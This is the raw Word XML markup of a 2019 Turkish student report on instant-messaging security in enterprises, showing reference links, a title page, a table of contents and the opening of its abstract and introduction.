            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>http://www.privacyfoundation.org/education/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://ciac.llnl.gov/ciac/bulletins/i-034.shtml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://ecommerce.ncsu.edu/csc513/ student_work/tech_cookie.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://www.rbaworld.com/security/computers/ cookies/cookies.shtml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://www.howstuffworks.com/cookie2.ht</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Kpr"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId135" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:t>http://www.pusulasecurity.com/hizmetlerimiz/guvenlik-duvari-firewall/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId136" w:history="1">
        <w:r w:rsidRPr="00552040">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:t>https://tr.wikipedia.org/wiki/G%C3%BCvenlik_duvar%C4%B1</w:t>
        </w:r>
      </w:hyperlink>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pPr>
        <w:ind w:left="28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E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="2124"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tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="468F096A" wp14:editId="7868FE6C">
            <wp:extent cx="1852781" cy="1852781"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="4116" name="1 Resim" descr="ata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Logo.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1855774" cy="1855774"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="2124"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TATÜRK ÜNİVERSİTESİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="2124"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ÜHENDSİLİK FAKÜLTESİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="2124"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İLGİSAYAR MÜHENDİSLİĞİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="2124" w:firstLine="708"/>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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İşletme Genelinde Ana Bilgisayar Tabanlı Güvenlik Duvarlarını Dağıtma:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bir Durum Çalışması</w:t>
      </w:r>
      <w:r w:rsidRPr="00840533">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">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nında Mesaj Güvenliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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ction: 2.2.28-2.3.1</w:t>
      </w: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zırlayan: Sedanur KALTAKKIRAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="5664" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mayıs 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>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ABDULSAMET HAŞILOĞLU</w:t>
      </w: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p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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lastRenderedPageBreak/>
        <w:t>İÇİNDEKİ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38" w:anchor="3" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>Özet ............................................ ...................................................... .................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>..</w:t>
        </w:r>
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>.... 2</w:t>
        </w:r>
      </w:hyperlink>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39" w:anchor="4" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>I. Anlık Mesajlaşma nedir?</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>.................................................. .....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>................................ 5</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u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>IM'de İşletme Kullanım Eğilimleri ......................................... .........................</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>....... 10</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40" w:anchor="6" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>II.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId141" w:anchor="6" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t xml:space="preserve">Potansiyel tehditler .............................................................................................. </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:hyperlink>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42" w:anchor="8" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>III.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId143" w:anchor="8" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t xml:space="preserve">Kurumsal IM Çözümü Seçerken Dikkat Edilmesi Gerekenler …...................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:hyperlink>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44" w:anchor="9" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>IV.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>En İyi Uygulamalar .......................................... ...............................................</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">.. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>21</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hyperlink r:id="rId145" w:anchor="9" w:history="1">
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t xml:space="preserve">Kurumsal Kullanıcılar için İpuçları ................................... ...................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="001103A3">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="tr-TR"/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:hyperlink>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r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Son Kullanıcılar İçin İpuçları ......................................... .........</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>.............................. 3</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>0</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ÖZET</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IM), her ikisiyle de popüler olan hızlı büyüyen bir iletişim arac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v ve kurumsal kullanıcılar. IM etkili ve kolay bir ağ aracı olsa d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abanlı iletişim, uygun güvenlik durumunda bir dizi güvenlik riski doğuru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önlemler uygulanmadı. Bu yazıda, kullanım ile ilgili güvenlik riskleri tartışılmakta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u popüler iletişim kanalı ve olabilecek en iyi uygulamaları sun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knolojiyi bir iş ortamında uygularken uygulan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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4"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 ANINDA MESAJ NE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IM), geçic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Neredeyse anında mesaj gönderip alarak 'canlı' işbirliğ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r ağ bağlantısınd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1. ICQ gibi mesajlaşma araçlarının tanıtımıyl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2.MSN Messeng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3. giderek daha fazla insan rahatlık ve kolaylıktan keyif alıyo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rçek zamanlı mesajlaşma sistemleri tarafından günlük yaşamlarında sağlanır. IM ayrıca b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üşterilerle ve ortaklarla iletişim kurmak gibi hizmetler için işyerinde yer alma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üşteri desteği sunmak, gerçek zamanlı uyarılar almak, yönetim v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proje koordinasyonu. IM araçları, hızlı yanıt veren ve hızlı olan tüm işlemleri destek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problem çözme gerekli ve e-postalardan daha hızlı iletişim olduğunda vey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lefonlar fayd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nel olarak, kullanıcının bir IM istemcisini müşterisine indirmesi ve yüklemesi gerek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haz (bir masaüstü bilgisayar, akıllı telefon veya PDA olabilir) ve bir kullanıc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letişim kurabilmesi için önce hesap. Bir IM sunucusu bir veritabanı olarak görev yap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mas noktaları bulunur. ICQ ve MSN Messenger gibi halka açık IM hizmetleri içi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unucular internette barındırılıyor. Kurumsal IM sistemlerinde, IM sunucular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luşun iç ağında barındırıld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ŞLETMELERDE IM'NİN KULLANIM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2007 yılında yapılan anlık mesajlaşma trend anketine gör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4</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 IM sadece değil</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v kullanıcıları arasında popüler olmakla birlikte, işyerinde de giderek yaygınlaşmaktadır. Dah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kete katılanların yüzde 27'den fazlası işte anlık mesajlaşma kullandıklarını belirtt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ohbet kullanıcılarının yaklaşık yüzde 